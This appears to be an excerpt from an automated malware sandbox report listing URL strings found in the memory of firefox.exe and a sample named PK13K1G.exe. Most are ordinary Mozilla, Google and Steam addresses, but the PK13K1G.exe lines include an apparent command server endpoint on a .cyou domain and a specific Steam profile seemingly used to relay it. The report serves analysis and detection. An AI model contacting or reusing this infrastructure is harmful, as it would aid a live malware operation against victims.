Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2628867564.000001324B254000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2626803778.000001324A61C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2621608217.0000013248F7D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000003.2521738346.000001324A633000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%shttps://mail.inbox.lv/compose?to=%shttps://mail.yahoo.co.jp/c
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 00000017.00000002.2628867564.000001324B270000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://profiler.firefox.com/
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: firefox.exe, 00000017.00000002.2708011983.00000132567A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.0000013249375000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.3158219440.00000287193D6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://relay.firefox.com/api/v1/
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 00000017.00000002.2628867564.000001324B2E7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000017.00000003.2520315947.000001324CD7B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/shims/google-analytics-legacy.jsshims/google-safeframe.html
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://screenshots.firefox.com/shims/google-analytics-legacy.jsshims/google-safeframe.html--panel-i
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2648295218.000001324D703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.0000013249375000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 00000017.00000002.2622599068.000001324937C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2648295218.000001324D703000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.0000013249375000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: PK13K1G.exe, 00000008.00000003.2555567301.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550286086.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sordid-snaked.cyou/api
Source: PK13K1G.exe, 00000008.00000002.2562292696.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2555567301.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550286086.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sordid-snaked.cyou/api4l
Source: firefox.exe, 00000017.00000002.2701121751.0000013254E92000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.3005244049.00000287196E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 00000017.00000002.2708011983.00000132567A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2607531192.000002713B612000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/https://getpocket.cdn.mozilla.net/
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/jar:file:///C:/Program%20Files/Mozilla%20Firefox/browser/features/webcom
Source: firefox.exe, 00000017.00000002.2708011983.00000132567A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2649004262.000001324D8DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2623987087.0000013249F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2648295218.000001324D7A5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000017.00000002.2704916068.000001325501A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs#
Source: firefox.exe, 00000017.00000002.2704916068.000001325501A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/spocs#l
Source: firefox.exe, 00000017.00000002.2708011983.00000132567F0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2623987087.0000013249F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2708011983.00000132567A0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2620149903.0000013248943000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001B.00000002.2607531192.000002713B69D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB3D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://spocs.getpocket.com/usergetValue/preffedBlockRegions
Source: firefox.exe, 00000017.00000002.2622599068.0000013249303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2655457741.000001324ECC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB07000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 00000017.00000002.2622599068.0000013249303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2653502406.000001324DED4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2655457741.000001324ECC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB07000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2654959105.000001324EB03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2622599068.00000132493DE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 00000017.00000002.2622599068.0000013249303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixelcolor-mix(in
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550286086.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: PK13K1G.exe, 00000008.00000002.2562292696.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2555567301.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550286086.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550286086.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: PK13K1G.exe, 00000008.00000002.2560501874.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2552449673.0000000000DCC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: PK13K1G.exe, 00000008.00000002.2562292696.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2555567301.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550286086.0000000000DFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com:443/profiles/76561199724331900
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: PK13K1G.exe, 00000008.00000003.2550179335.0000000000E5E000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000002.2565766446.0000000000E62000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551839737.0000000000E61000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
Source: PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2550286086.0000000000DD7000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: PK13K1G.exe, 00000008.00000003.2549488935.0000000000E65000.00000004.00000020.00020000.00000000.sdmp, PK13K1G.exe, 00000008.00000003.2551989010.0000000000E6A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: firefox.exe, 00000017.00000002.2628867564.000001324B2E7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000036.00000003.3152852196.00000287197DF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cross-site-tracking-report
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/cryptominers-report
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/fingerprinters-report
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/firefox-relay-integration
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/password-manager-report
Source: firefox.exe, 00000017.00000002.2654959105.000001324EB17000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/resource://gre/modules/PrivateBrowsing
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/search-engine-removal
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/send-tab
Source: firefox.exe, 00000017.00000002.2621289019.0000013248D80000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2607583693.000001C2B1D30000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001B.00000002.2609275559.000002713BC70000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/shield
